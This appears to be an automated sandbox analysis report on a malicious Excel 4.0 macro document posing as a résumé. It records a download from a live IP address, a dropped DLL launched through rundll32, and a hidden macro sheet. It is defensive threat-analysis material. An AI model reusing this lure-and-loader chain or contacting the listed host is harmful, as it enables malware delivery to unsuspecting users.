Loading ...

Play interactive tourEdit tour

Analysis Report myResume_787.xlsb

Overview

General Information

Sample Name:myResume_787.xlsb
Analysis ID:342307
MD5:89394df2bb1ba2e4b62d510b8bcb97fb
SHA1:78147f2bcc5f4aeebae3c2cf333f4821a3d5c84f
SHA256:09e73c5d8c0236688d9c690189601400b7c720f99aa05b1090c93608bdb96d01

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5764 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6620 cmdline: 'C:\Windows\System32\rundll32.exe' C:\YvfpvrE\UVqsCZG\zSdSPJb.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\YvfpvrE\UVqsCZG\zSdSPJb.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\YvfpvrE\UVqsCZG\zSdSPJb.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5764, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\YvfpvrE\UVqsCZG\zSdSPJb.dll,DllRegisterServer, ProcessId: 6620

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
Source: global trafficTCP traffic: 192.168.2.4:49741 -> 209.141.51.196:80
Source: global trafficTCP traffic: 192.168.2.4:49741 -> 209.141.51.196:80
Source: global trafficHTTP traffic detected: GET /Lk9tdZ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 209.141.51.196Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 209.141.51.196
Source: unknownTCP traffic detected without corresponding DNS query: 209.141.51.196
Source: unknownTCP traffic detected without corresponding DNS query: 209.141.51.196
Source: unknownTCP traffic detected without corresponding DNS query: 209.141.51.196
Source: unknownTCP traffic detected without corresponding DNS query: 209.141.51.196
Source: unknownTCP traffic detected without corresponding DNS query: 209.141.51.196
Source: global trafficHTTP traffic detected: GET /Lk9tdZ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 209.141.51.196Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Jan 2021 18:13:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveCache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0Expires: 0Last-Modified: Wed, 20 Jan 2021 18:13:42 GMTPragma: no-cacheSet-Cookie: _subid=1btl9dh6o2;Expires=Saturday, 20-Feb-2021 18:13:42 GMT;Max-Age=2678400;Path=/Set-Cookie: c57e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjRcIjoxNjExMTY2NDIyfSxcImNhbXBhaWduc1wiOntcIjFcIjoxNjExMTY2NDIyfSxcInRpbWVcIjoxNjExMTY2NDIyfSJ9.d1BAgAdzqK6yWItY7wGFXevPiuWFlgAw2eLbXym_MdY;Expires=Saturday, 20-Feb-2021 18:13:42 GMT;Max-Age=2678400;Path=/Vary: Accept-Encoding
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.aadrm.com/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.cortana.ai
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.office.net
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.onedrive.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://augloop.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://cdn.entity.
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://clients.config.office.net/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://config.edge.skype.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://cortana.ai
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://cortana.ai/api
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://cr.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://dev.cortana.ai
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://devnull.onenote.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://directory.services.
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://graph.windows.net
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://graph.windows.net/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://lifecycle.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://login.windows.local
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://management.azure.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://management.azure.com/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://messaging.office.com/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://officeapps.live.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://onedrive.live.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://outlook.office.com/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://outlook.office365.com/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://settings.outlook.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://staging.cortana.ai
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://tasks.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 77C43E78-5473-430D-A2CF-3011B6265ED8.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: myResume_787.xlsbInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: myResume_787.xlsbInitial sample: Sheet size: 775974
Source: classification engineClassification label: mal60.expl.evad.winXLSB@3/5@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E0399F10-6F03-4C18-976C-C96CC2B2AC6C} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\YvfpvrE\UVqsCZG\zSdSPJb.dll,DllRegisterServer
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\YvfpvrE\UVqsCZG\zSdSPJb.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\YvfpvrE\UVqsCZG\zSdSPJb.dll,DllRegisterServerJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
